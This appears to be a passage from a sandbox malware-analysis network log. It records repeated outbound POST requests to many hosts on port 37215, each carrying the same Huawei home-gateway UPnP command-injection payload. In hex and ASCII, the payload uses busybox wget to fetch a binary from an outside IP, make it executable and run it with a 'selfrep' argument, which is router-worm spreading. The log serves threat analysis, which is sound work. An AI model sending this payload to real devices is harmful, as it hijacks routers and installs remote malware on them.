6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  455192.168.2.135377441.180.89.14537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.281686068 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  456192.168.2.1344044197.226.57.17037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.281697035 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  457192.168.2.1344408157.131.98.16837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.281723976 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  458192.168.2.1342642157.157.45.14537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.281755924 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  459192.168.2.1358948197.181.215.11037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.281774044 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  460192.168.2.1357106197.82.204.3037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.282018900 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  461192.168.2.1341708157.207.62.19937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.282040119 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  462192.168.2.133516844.176.25.23637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.282062054 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  463192.168.2.1348482157.65.251.8237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.282084942 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  464192.168.2.1342880197.22.236.24237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.282108068 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  465192.168.2.134905841.1.178.7837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.282125950 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
